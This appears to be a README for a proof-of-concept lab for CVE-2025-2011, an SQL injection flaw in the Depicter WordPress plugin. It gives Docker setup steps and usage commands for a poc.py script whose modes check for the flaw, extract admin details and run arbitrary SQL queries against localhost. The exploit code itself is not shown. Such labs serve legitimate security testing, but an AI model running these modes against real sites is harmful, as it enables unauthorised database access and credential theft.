
PoC for CVE-2025-2011 - SQLi in Depicter plugin <= 3.6.1
CVE Reference: CVE-2025-2011
This repository contains a proof-of-concept environment for testing the SQL injection vulnerability in Depicter Slider & Popup Builder plugin (versions < 3.6.2).
requests, coloramaStart the Environment
docker-compose up -d
Complete WordPress Installation
http://localhost:5555Install the Vulnerable Plugin
chmod +x install-plugin.sh
./install-plugin.sh
This script will:
Install Python Dependencies
pip install requests colorama
The PoC script (poc.py) can be used to test the vulnerability in different modes:
Check if target is vulnerable
python poc.py -u http://localhost:5555
Extract admin details
python poc.py -u http://localhost:5555 -m admin
Execute custom SQL query
python poc.py -u http://localhost:5555 -m custom -q "SELECT VERSION()"
Enable debug output
python poc.py -u http://localhost:5555 -d
To stop and remove the environment:
docker-compose down -v
This environment is provided for educational and testing purposes only. Do not use this against any systems without explicit permission.